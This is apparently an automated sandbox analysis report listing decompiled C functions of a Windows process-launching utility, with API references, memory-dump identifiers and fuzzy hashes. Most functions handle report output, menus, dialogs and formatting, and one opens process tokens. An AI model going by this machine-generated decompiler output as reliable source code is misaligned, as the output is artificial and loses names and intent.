                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				void _v68;
                                                                                                                				char _v108;
                                                                                                                				void _v160;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t55;
                                                                                                                				void* _t57;
                                                                                                                				wchar_t* _t67;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				signed int _t74;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t95;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t100;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t73 = __ebx;
                                                                                                                				_t74 = 0xd;
                                                                                                                				_push(9);
                                                                                                                				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
                                                                                                                				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
                                                                                                                				_t102 = _t100 + 0x18;
                                                                                                                				asm("movsw");
                                                                                                                				E00407343(__ebx, _a4, L"<tr>");
                                                                                                                				_t95 = 0;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
                                                                                                                						_v8 = _t55;
                                                                                                                						_t57 =  &_v160;
                                                                                                                						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
                                                                                                                							_t57 =  &_v68;
                                                                                                                						}
                                                                                                                						_t98 = _a8;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _v20 | 0xffffffff;
                                                                                                                						_v16 = _v16 & 0x00000000;
                                                                                                                						_v12 = _t57;
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
                                                                                                                						E0040ADC0(_v28,  &_v108);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
                                                                                                                						_t67 =  *(_t73 + 0x64);
                                                                                                                						_t86 =  *_t67 & 0x0000ffff;
                                                                                                                						if(_t86 == 0 || _t86 == 0x20) {
                                                                                                                							wcscat(_t67, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x68)));
                                                                                                                						_push( &_v108);
                                                                                                                						_push(_v12);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t102 = _t102 + 0x1c;
                                                                                                                						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
                                                                                                                						_t95 = _t95 + 1;
                                                                                                                					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t73, _a4, L"\r\n");
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
                                                                                                                				struct tagMENUITEMINFOW _v0;
                                                                                                                				int _t24;
                                                                                                                				wchar_t* _t30;
                                                                                                                				intOrPtr _t32;
                                                                                                                				int _t34;
                                                                                                                				int _t42;
                                                                                                                				signed int _t47;
                                                                                                                				signed int _t48;
                                                                                                                
                                                                                                                				_t36 = __ecx;
                                                                                                                				_t48 = _t47 & 0xfffffff8;
                                                                                                                				E0040B550(0x203c, __ecx);
                                                                                                                				_t24 = GetMenuItemCount(_a8);
                                                                                                                				_t34 = _t24;
                                                                                                                				_t42 = 0;
                                                                                                                				if(_t34 <= 0) {
                                                                                                                					L13:
                                                                                                                					return _t24;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					memset( &_a50, 0, 0x2000);
                                                                                                                					_t48 = _t48 + 0xc;
                                                                                                                					_a36 =  &_a48;
                                                                                                                					_v0.cbSize = 0x30;
                                                                                                                					_a4 = 0x36;
                                                                                                                					_a40 = 0x1000;
                                                                                                                					_a16 = 0;
                                                                                                                					_a48 = 0;
                                                                                                                					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
                                                                                                                					if(_t24 == 0) {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					if(_a48 == 0) {
                                                                                                                						L10:
                                                                                                                						_t56 = _a20;
                                                                                                                						if(_a20 != 0) {
                                                                                                                							_push(0);
                                                                                                                							_push(_a20);
                                                                                                                							_push(_a4);
                                                                                                                							_t24 = E0040605E(_t36, _t56);
                                                                                                                							_t48 = _t48 + 0xc;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t30 = wcschr( &_a48, 9);
                                                                                                                					if(_t30 != 0) {
                                                                                                                						 *_t30 = 0;
                                                                                                                					}
                                                                                                                					_t31 = _a16;
                                                                                                                					if(_a20 != 0) {
                                                                                                                						if(_a12 == 0) {
                                                                                                                							 *0x40fe20 =  *0x40fe20 + 1;
                                                                                                                							_t32 =  *0x40fe20; // 0x0
                                                                                                                							_t31 = _t32 + 0x11558;
                                                                                                                							__eflags = _t32 + 0x11558;
                                                                                                                						} else {
                                                                                                                							_t17 = _t42 + 0x11171; // 0x11171
                                                                                                                							_t31 = _t17;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t24 = E00406025(_t31,  &_a48);
                                                                                                                					_pop(_t36);
                                                                                                                					goto L10;
                                                                                                                					L12:
                                                                                                                					_t42 = _t42 + 1;
                                                                                                                				} while (_t42 < _t34);
                                                                                                                				goto L13;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				int _v24;
                                                                                                                				int _v28;
                                                                                                                				void* _t27;
                                                                                                                				int _t31;
                                                                                                                				void* _t34;
                                                                                                                				int _t37;
                                                                                                                				int _t38;
                                                                                                                				int _t41;
                                                                                                                				int _t50;
                                                                                                                
                                                                                                                				_t34 = __ebx;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                                                                					return _t27;
                                                                                                                				} else {
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					asm("movsd");
                                                                                                                					_v8 = GetSystemMetrics(0x4e);
                                                                                                                					_v12 = GetSystemMetrics(0x4f);
                                                                                                                					_t41 = GetSystemMetrics(0x4c);
                                                                                                                					_t31 = GetSystemMetrics(0x4d);
                                                                                                                					if(_v8 == 0 || _v12 == 0) {
                                                                                                                						_v8 = GetSystemMetrics(0);
                                                                                                                						_v12 = GetSystemMetrics(1);
                                                                                                                						_t41 = 0;
                                                                                                                						_t31 = 0;
                                                                                                                					} else {
                                                                                                                						_v8 = _v8 + _t41;
                                                                                                                						_v12 = _v12 + _t31;
                                                                                                                					}
                                                                                                                					_t50 = _v20 - _v28;
                                                                                                                					if(_t50 > 0x14) {
                                                                                                                						_t38 = _v24;
                                                                                                                						_t37 = _v16 - _t38;
                                                                                                                						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                                							_t31 = _t31 + 0xfffffff6;
                                                                                                                							if(_t38 >= _t31) {
                                                                                                                								_t31 = _v28;
                                                                                                                								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                                									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t31;
                                                                                                                				}
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char* _v24;
                                                                                                                				char _v28;
                                                                                                                				char* _v48;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				int _v64;
                                                                                                                				int _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				wchar_t* _v80;
                                                                                                                				intOrPtr _v84;
                                                                                                                				int _v92;
                                                                                                                				char* _v96;
                                                                                                                				intOrPtr _v104;
                                                                                                                				struct tagOFNA _v108;
                                                                                                                				void _v634;
                                                                                                                				long _v636;
                                                                                                                				void _v2682;
                                                                                                                				char _v2684;
                                                                                                                				void* __ebx;
                                                                                                                				char _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				int _t46;
                                                                                                                				signed short _t54;
                                                                                                                
                                                                                                                				_v636 = 0;
                                                                                                                				memset( &_v634, 0, 0x208);
                                                                                                                				_v2684 = 0;
                                                                                                                				memset( &_v2682, 0, 0x7fe);
                                                                                                                				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                                				_v12 = _t37;
                                                                                                                				_t38 =  *0x40cbf0; // 0x67
                                                                                                                				_v8 = _t38;
                                                                                                                				_v28 = E00405B81(0x227);
                                                                                                                				_v24 = L"*.cfg";
                                                                                                                				_v20 = E00405B81(0x228);
                                                                                                                				_v16 = L"*.*";
                                                                                                                				E00405236( &_v2684,  &_v28);
                                                                                                                				_t54 = 0xa;
                                                                                                                				_v60 = E00405B81(_t54);
                                                                                                                				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                                				_v48 =  &_v12;
                                                                                                                				_v96 =  &_v2684;
                                                                                                                				_v108 = 0x4c;
                                                                                                                				_v92 = 0;
                                                                                                                				_v84 = 1;
                                                                                                                				_v80 =  &_v636;
                                                                                                                				_v76 = 0x104;
                                                                                                                				_v72 = 0;
                                                                                                                				_v64 = 0;
                                                                                                                				_v56 = 0x80806;
                                                                                                                				_t46 = GetSaveFileNameW( &_v108);
                                                                                                                				if(_t46 != 0) {
                                                                                                                					wcscpy( &_v636, _v80);
                                                                                                                					return E0040365E(__edi, 1,  &_v636);
                                                                                                                				}
                                                                                                                				return _t46;
                                                                                                                			}































                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                				struct _SYSTEMTIME _v20;
                                                                                                                				long _v276;
                                                                                                                				long _v532;
                                                                                                                				FILETIME* _t15;
                                                                                                                
                                                                                                                				_t15 = __eax;
                                                                                                                				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                                						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                                						wcscpy(_a4,  &_v276);
                                                                                                                						wcscat(_a4, " ");
                                                                                                                						wcscat(_a4,  &_v532);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L5:
                                                                                                                					wcscpy(_a4, 0x40c4e8);
                                                                                                                				}
                                                                                                                				return _a4;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                				void _v514;
                                                                                                                				long _v516;
                                                                                                                				wchar_t* _t34;
                                                                                                                				signed int _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_t34 = __edi;
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				 *__edi =  *__edi & 0x00000000;
                                                                                                                				_t37 = _t36 + 0xc;
                                                                                                                				_t35 = 0;
                                                                                                                				do {
                                                                                                                					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                					_push(L"%2.2X");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v516);
                                                                                                                					L0040B1EC();
                                                                                                                					_t37 = _t37 + 0x10;
                                                                                                                					if(_t35 > 0) {
                                                                                                                						wcscat(_t34, " ");
                                                                                                                					}
                                                                                                                					if(_a8 > 0) {
                                                                                                                						asm("cdq");
                                                                                                                						if(_t35 % _a8 == 0) {
                                                                                                                							wcscat(_t34, L"  ");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					wcscat(_t34,  &_v516);
                                                                                                                					_t35 = _t35 + 1;
                                                                                                                				} while (_t35 < 0x80);
                                                                                                                				return _t34;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				char _v1028;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t16;
                                                                                                                				void* _t19;
                                                                                                                				intOrPtr* _t29;
                                                                                                                				char* _t31;
                                                                                                                
                                                                                                                				_t29 = __ecx;
                                                                                                                				_v516 = 0;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t16 = _t29;
                                                                                                                				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                				} else {
                                                                                                                					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                				}
                                                                                                                				E00407343(_t16);
                                                                                                                				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                				_t31 =  &_v516;
                                                                                                                				E00407250(_t31, _t19);
                                                                                                                				_push(_t31);
                                                                                                                				_push(L"<%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t29, _a4,  &_v1028);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
                                                                                                                				void _v526;
                                                                                                                				char _v528;
                                                                                                                				void _v2574;
                                                                                                                				char _v2576;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t29;
                                                                                                                
                                                                                                                				_v2576 = 0;
                                                                                                                				memset( &_v2574, 0, 0x7fe);
                                                                                                                				_v528 = 0;
                                                                                                                				memset( &_v526, 0, 0x208);
                                                                                                                				E00404AD9( &_v528);
                                                                                                                				_push( &_v528);
                                                                                                                				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                                				_push(0x3ff);
                                                                                                                				_push( &_v2576);
                                                                                                                				L0040B1EC();
                                                                                                                				_t37 = _a4 + 0xa68;
                                                                                                                				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                                				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                                				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                                				_t29 = E0040467A(_t37);
                                                                                                                				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                                				return _t29;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
